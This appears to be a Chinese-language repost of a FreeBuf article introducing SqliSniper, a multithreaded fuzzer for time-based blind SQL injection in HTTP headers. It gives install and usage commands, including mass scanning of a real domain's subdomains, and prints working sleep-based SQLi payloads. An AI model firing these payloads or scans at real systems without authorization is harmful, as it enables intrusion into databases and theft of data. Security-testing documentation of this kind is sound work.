1、基于时间的SQL盲注检测:确定HTTP Header中潜在的SQL注入漏洞; 2、多线程扫描:通过并行处理提供更快的扫描能力; 3、Discord通知:通过Discord webhook发送检测到的漏洞警报; 4、假阳性检查:实现响应时间分析,以区分误报; 5、支持自定义Payload和Header:允许用户自定义用于扫描目标的Payload和Header;
git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
pip3 install -r requirements.txt
chmod +x sqlisniper.py
命令参数解析
-h, --help:显示工具帮助信息和退出;
-u URL, --url URL:扫描单个目标URL;
-r URLS_FILE, --urls_file URLS_FILE:包含目标URL列表的文件;
-p, --pipeline:从pipeline读取目标URL;
--proxy PROXY:拦截请求的代理,例如http://127.0.0.1:8080;
--payload PAYLOAD:包含Payload的文件路径,默认为payloads.txt;
--single-payload SINGLE_PAYLOAD:用于测试的单个Payload路径;
--discord DISCORD:Discord Webhook URL;
--headers HEADERS:包含Header的文件路径,默认为headers.txt;
--threads THREADS:运行线程数量;
扫描单个目标
./sqlisniper.py -u http://example.com
文件输入
./sqlisniper.py -r url.txt
cat url.txt | ./sqlisniper.py -p
subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p
使用自定义Payload执行扫描
./sqlisniper.py -u http://example.com --payload mssql_payloads.txt
ubuntu:~/sqlisniper$ cat payloads.txt
0"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
使用单个Payload执行扫描
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
使用自定义Header执行扫描
ubuntu:~/sqlisniper$ cat headers.txt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1
发送Discord警报通知
./sqlisniper.py -r url.txt --discord <web_hookurl>
多线程执行
./sqlisniper.py -r url.txt --threads 10
工具运行截图
原文始发于微信公众号(FreeBuf):SqliSniper:针对HTTP Header的基于时间SQL盲注模糊测试工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论